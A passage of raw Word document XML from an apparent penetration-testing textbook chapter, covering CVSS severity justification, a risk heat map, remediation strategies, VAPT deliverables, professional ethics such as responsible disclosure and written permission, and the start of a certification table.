      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EAF1FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F5597"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">★ Why comparing these two examples matters</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Both vulnerabilities share Attack Vector: Network and Attack Complexity: Low, yet their scores differ by more than 3.5 points. This is the central lesson of CVSS: severity is the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">product of several independent factors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, not a single property like “reachable from the internet”. A score must always be justified by stating the chosen metric for each of the six base categories, not just quoted as a number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ A note on CVSS precision</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Exact base scores can vary slightly by calculator/tool version rounding. What an exam or a report needs is the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">correct metric selection and reasoning</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, and a score in the correct severity band — always show your vector string and reasoning, not just a final number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdsq8jcfpd2jicem7uz4evs">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">FIRST — Official CVSS v3.1 Calculator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Comparing and Justifying Severity Ratings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When two findings both score “High”, a report should still explain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">why</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — citing the specific metrics that drove the score (e.g. “High due to network-reachable, unauthenticated access, despite only partial impact”). This lets a client's security team sanity-check the rating rather than trusting a bare number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Risk Heat Maps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">risk heat map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plots findings on two axes — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">likelihood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (how easily/likely it is to be exploited) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (how severe the consequence would be) — giving stakeholders an immediate visual sense of priority, which complements but does not replace the detailed CVSS scoring.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">■ Risk heat map (Impact vs Likelihood)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High Impact    |  Medium Risk   |  HIGH RISK     |  CRITICAL RISK</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium Impact  |  Low Risk      |  Medium Risk   |  HIGH RISK</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Low Impact     |  Low Risk      |  Low Risk      |  Medium Risk</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">               |  Low Likelihood| Medium Likel.  |  High Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Remediation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — applying vendor security updates promptly, especially for actively exploited CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — removing default credentials, disabling unused services, hardening settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Principle of least privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — giving every account and service only the access it actually needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — checking and sanitising all untrusted input before it reaches a database query, a command, or the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Output encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — encoding data before displaying it in a web page (the core defence against XSS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 VAPT Deliverables and Evidence Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A complete VAPT engagement delivers more than a report: it includes supporting evidence (screenshots, raw tool output, request/response captures), a methodology summary, and often a re-test after fixes are applied. Evidence should be organised by finding ID, stored securely, and retained only as long as the client's data-retention and confidentiality agreement allows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 Professional Ethics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible disclosure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if a vulnerability is found outside the agreed scope, or after an engagement ends, it should be reported privately to the affected organisation, giving them reasonable time to fix it before any public disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug bounty platforms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — services like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HackerOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bugcrowd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> formally connect organisations with researchers, defining scope and reward for responsibly reported vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Never test without written permission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the single rule that separates every technique in this book from a criminal offence under the IT Act 2000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Protecting client data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — every credential, document or vulnerability encountered during a test is confidential and covered by the engagement's NDA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdttelpt6rjv0usnd2xinoq">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">HackerOne — bug bounty and vulnerability disclosure platform</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIddlm4wtsd7oelisoxsvfyc">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Bugcrowd — bug bounty and vulnerability disclosure platform</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8 Certification Pathways</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1949"/>
        <w:gridCol w:w="1754"/>
        <w:gridCol w:w="6043"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Certification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1754"/>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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6043"/>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Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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CompTIA Security+</w:t>
            </w:r>
